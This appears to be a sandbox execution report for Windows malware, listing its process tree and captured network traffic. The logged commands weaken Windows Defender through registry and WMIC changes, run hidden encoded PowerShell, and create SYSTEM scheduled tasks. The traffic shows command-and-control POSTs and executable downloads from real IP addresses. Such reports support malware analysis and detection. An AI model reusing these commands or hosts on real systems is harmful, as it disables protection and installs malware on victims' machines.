C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:6136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3508
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 00:23:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FHAVoFv.exe\" GH /BJPYdidQd 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:5672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵PID:5564
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵PID:3940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:3696 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5524
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5780
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:5264
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\PywzyBK.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\PywzyBK.exe GH /vbYLdidcG 385118 /S1⤵PID:1540
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5512
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5132
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2800
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3820
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4844
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:3292
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4572
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5708
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:2272
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:3004
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:3280
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5600
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3844
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1908
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:1008 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4880
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:3864
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4136
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2164
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:5204
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:6024 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5824
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\bxAyNb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Creates scheduled task(s)
PID:5932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\GUmDGCh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"2⤵PID:5136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"2⤵PID:2008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4760
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\BrifWVG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\AmVjuQH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\ilJdFch.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\QaNfTzx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 03:29:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\KMDStJvZ\ykLJqBG.dll\",#1 /odidZWiT 385118" /V1 /F2⤵
- Creates scheduled task(s)
PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rrqYunoktxOQmCoCX"2⤵PID:4604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"2⤵PID:5872
-
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FHAVoFv.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FHAVoFv.exe GH /BJPYdidQd 385118 /S1⤵PID:5592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5484
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5992
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5952
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:6028
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:3644
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1184
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:424
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5384
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:972
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5612
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:3184
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:3776
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1500
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:6036
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:5168 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1992
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:5172
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:3760
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2036
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:1228
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
PID:1088 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:1476
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\ykuvci.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Creates scheduled task(s)
PID:2444
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5376
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\KMDStJvZ\ykLJqBG.dll",#1 /odidZWiT 3851181⤵PID:4160
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\KMDStJvZ\ykLJqBG.dll",#1 /odidZWiT 3851182⤵PID:716
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"3⤵PID:1416
-
-
Network
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 160
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.141:80RequestPOST /go34ko8/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.141
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.7:80RequestGET /cost/sarra.exe HTTP/1.1
Host: 5.42.96.7
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:29 GMT
Content-Type: application/octet-stream
Content-Length: 2433536
Last-Modified: Sun, 12 May 2024 03:18:15 GMT
Connection: keep-alive
ETag: "664034f7-252200"
Accept-Ranges: bytes
-
Remote address:5.42.96.7:80RequestGET /mine/amers.exe HTTP/1.1
Host: 5.42.96.7
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:33 GMT
Content-Type: application/octet-stream
Content-Length: 1918464
Last-Modified: Sun, 12 May 2024 03:19:12 GMT
Connection: keep-alive
ETag: "66403530-1d4600"
Accept-Ranges: bytes
-
Remote address:5.42.96.7:80RequestGET /cost/random.exe HTTP/1.1
Host: 5.42.96.7
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:36 GMT
Content-Type: application/octet-stream
Content-Length: 2310160
Last-Modified: Sun, 12 May 2024 03:17:47 GMT
Connection: keep-alive
ETag: "664034db-234010"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request141.96.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request7.96.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request78.96.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.128.172.185.in-addr.arpaIN PTR
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 160
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:40:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.7:80RequestPOST /zamo7h/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.96.7
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.96.78:80RequestGET /files/file300un.exe HTTP/1.1
Host: 5.42.96.78
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 11 May 2024 21:18:01 GMT
ETag: "1e94309-618342fe7897a"
Accept-Ranges: bytes
Content-Length: 32064265
Content-Type: application/x-msdownload
-
Remote address:185.172.128.19:80RequestGET /NewB.exe HTTP/1.1
Host: 185.172.128.19
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:00 GMT
Content-Type: application/octet-stream
Content-Length: 428544
